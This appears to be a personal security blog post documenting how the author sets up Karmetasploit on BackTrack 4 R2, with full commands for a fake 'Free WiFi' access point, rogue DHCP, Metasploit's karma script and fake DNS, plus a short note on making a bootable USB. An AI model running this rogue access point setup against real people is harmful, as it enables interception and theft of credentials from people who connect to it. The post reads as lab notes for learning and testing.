Bill’s Security Blog

Purpose
The purpose of this post is to provide quick guidance on getting Karmetasploit running on BT4R2 for my specific environment.  These steps may work for you, but this post is intended, primarily, to document this so I can remember it later…

Background
Karmetasploit is a combination of Karma and Metaploit.

Resources Used
1: KARMA + Metasploit Framework 3 == Karmetasploit
2: Metasploit with MYSQL in BackTrack 4 r2
3: Karmetasploit Configuration
4a: Metasploit + Karma=Karmetasploit Part 1
4b: Metasploit + Karma=Karmetasploit Part 2

Prerequisites

• BT4R2 is installed
• Networking to the Internet is available (to update BT and MSF)

Update BackTrack and MSF
Update BT4R2

> /usr/bin/apt-get update
> /usr/bin/apt-get upgrade

Update MSF

> /opt/metasploit3/msf3/msfupdate

Configure
Metasploit Karma Configuration File
Download File

> /usr/bin/lynx -nolist -dump http://metasploit.com/users/hdm/tools/karma.rc > karma.rc

Edit File
Change the following lines as noted
load db_sqllite3 –> db_driver mysql
db_create /root/karma.db –> db_connect root:toor@localhost/karma

DHCP Configuration File
Edit File
Change the following config file as described in Resource 1.
/etc/dhcp3/dhcpd.conf

Reboot
Restart the host to reset the wireless network… This step may be necessary if you were using the wireless interface to perform the above activities.

Test Wireless Injection

> /usr/local/sbin/airmon-ng start wlan0

The above command creates interface mon0.
The next command tests packet injection on the interface. (Note, this is “DASH DASH test mon0″ - it may display as “DASH test mon0″ in your browser).

> /usr/local/sbin/aireplay-ng –test mon0

To stop the monitor interface

> /usr/local/sbin/airmon-ng stop mon0

Run
Start MySQL

> /etc/init.d/mysql start

Create Fake AP
If have not done so, place the wireless card in monitor mode using:

> /usr/local/sbin/airmon-ng start wlan0

Then execute the following commands:

> /usr/local/sbin/airbase-ng -P -C 30 -c 1 -e “Free WiFi” -v mon0

(The above command creates interface at0. We will use this as the end-point interface for clients connecting to our fake AP.)
Note: without the -c 1 option, my AP would NOT show up in the available networks list of my victim. I obtained the channel number by looking at the output of the –test. I compared the APs showing up in that list to those showing up on my victim, then using the same channel. Others have experienced this as noted in Kosis’s comment on CG’s blog post (Resource 4b).

> /sbin/ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
> /usr/sbin/dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
> /opt/metaploit3/msf3/msfconsole -r karma.rc
> /usr/sbin/tcpdump -w dump.pcap -i at0

Look at Progress

msf> db_notes

Consider: Blackhole Routing from the MSF paper

NOTES
Looks like fakedns crashes after some time. Appears to crash after first client connections. How to monitor?
The fakedns can be restarted as follows:

msf> use auxiliary/server/fakedns
msf> set SRVPORT 53
msf> run

I want to get started with BackTrack 4 R2 (BT4R2) on a dedicated laptop. But I don’t think I can burn a DVD reliably, so I need another method.

Solution - Bootable USB Thumb Drive

This solution may work with other operating systems…

Steps:

1. Download BT4R2 ISO image.
2. Download UNetbootin and install.
3. Use UNetbootin to create the bootable ISO. This may take a while.
4. Prep target laptop by ensuring that the “boot from USB” option is enabled.  On my test box, a D620, it’s F2 at boot to get into the BIOS configuration.  NOTE: Be sure to clean up the boot settings once the OS is installed on the HDD.
5. Once UNetbootin is done creating the bootable USB drive, insert the key into the target laptop and boot!
6. Follow process to install BT4R2.

Saweet.

Bill